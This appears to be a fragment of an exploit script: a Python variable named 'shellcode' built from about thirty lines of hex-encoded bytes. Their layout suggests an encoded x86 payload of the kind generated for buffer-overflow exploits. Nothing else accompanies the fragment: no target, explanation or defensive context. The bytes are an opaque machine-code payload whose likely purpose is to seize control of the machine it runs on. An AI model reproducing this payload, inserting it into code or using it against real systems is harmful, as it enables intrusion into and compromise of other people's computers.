shellcode  =   b""
shellcode  +=  b"\xbd\xbf\xaa\xa8\x9d\xda\xc4\xd9\x74\x24\xf4\x58\x2b\xc9"
shellcode  +=  b"\xb1\x59\x31\x68\x14\x03\x68\x14\x83\xc0\x04\x5d\x5f\x54"
shellcode  +=  b"\x75\x2e\xa0\xa5\x86\x50\x90\x77\xe2\x1b\x80\x47\x62\xfe"
shellcode  +=  b"\xae\xfa\x78\x8b\xe3\xee\xb1\x74\x0c\xb8\xf8\xac\x98\xb4"
shellcode  +=  b"\xd4\x81\x5e\x94\x19\x80\x22\xe7\x4d\x62\x1a\x28\x80\x63"
shellcode  +=  b"\x5b\xfe\xee\x8c\x31\x8a\x43\x42\xe1\x07\x21\x5e\x0c\xc8"
shellcode  +=  b"\x2d\xde\x76\x6d\xf1\xaa\xca\x6c\x22\xd9\x8b\x4e\x92\x56"
shellcode  +=  b"\x63\x97\x13\xbb\xf1\x6e\x67\x07\xcb\x8f\xc1\xfc\x1f\xfb"
shellcode  +=  b"\xd3\xd4\x51\x3b\x7f\x19\x5e\xb6\x81\x5e\x59\x29\xf4\x94"
shellcode  +=  b"\x99\xd4\x0f\x6f\xe3\x02\x85\x6f\x43\xc0\x3d\x4b\x75\x05"
shellcode  +=  b"\xdb\x18\x79\xe2\xaf\x46\x9e\xf5\x7c\xfd\x9a\x7e\x83\xd1"
shellcode  +=  b"\x2a\xc4\xa0\xf5\x77\x9e\xc9\xac\xdd\x71\xf5\xae\xba\x2e"
shellcode  +=  b"\x53\xa5\x29\x38\xe3\x46\xb2\x45\xb9\xd0\x7e\x88\x42\x20"
shellcode  +=  b"\xe9\x9b\x31\x12\xb6\x37\xde\x1e\x3f\x9e\x19\x17\x57\x21"
shellcode  +=  b"\xf5\x9f\x38\xdf\xf6\xdf\x11\x24\xa2\x8f\x09\x8d\xcb\x44"
shellcode  +=  b"\xca\x32\x1e\xf0\xc0\xa4\xab\xc7\xb1\xcd\xc4\xc5\x39\x3b"
shellcode  +=  b"\xa6\x40\xdf\x13\x98\x02\x70\xd4\x48\xe2\x20\xbc\x82\xed"
shellcode  +=  b"\x1f\xdc\xac\x24\x08\x77\x43\x90\x60\xe0\xfa\xb9\xfb\x91"
shellcode  +=  b"\x03\x14\x86\x92\x88\x9c\x76\x5c\x79\xd5\x64\x89\x1e\x15"
shellcode  +=  b"\x75\x4a\x8b\x15\x1f\x4e\x1d\x42\xb7\x4c\x78\xa4\x18\xae"
shellcode  +=  b"\xaf\xb7\x5f\x50\x2e\x81\x14\x67\xa4\xad\x42\x88\x28\x2d"
shellcode  +=  b"\x93\xde\x22\x2d\xfb\x86\x16\x7e\x1e\xc9\x82\x13\xb3\x5c"
shellcode  +=  b"\x2d\x45\x67\xf6\x45\x6b\x5e\x30\xca\x94\xb5\x42\x0d\x6a"
shellcode  +=  b"\x4b\x6d\xb6\x02\xb3\x2d\x46\xd2\xd9\xad\x16\xba\x16\x81"
shellcode  +=  b"\x99\x0a\xd6\x08\xf2\x02\x5d\xdd\xb0\xb3\x62\xf4\x15\x6d"
shellcode  +=  b"\x62\xfb\x8d\x9e\x19\x74\x31\x5f\xde\x9c\x56\x60\xde\xa0"
shellcode  +=  b"\x68\x5d\x08\x99\x1e\xa0\x88\x9e\x11\x97\xad\xb7\xbb\xd7"
shellcode  +=  b"\xe2\xc8\xe9"
  
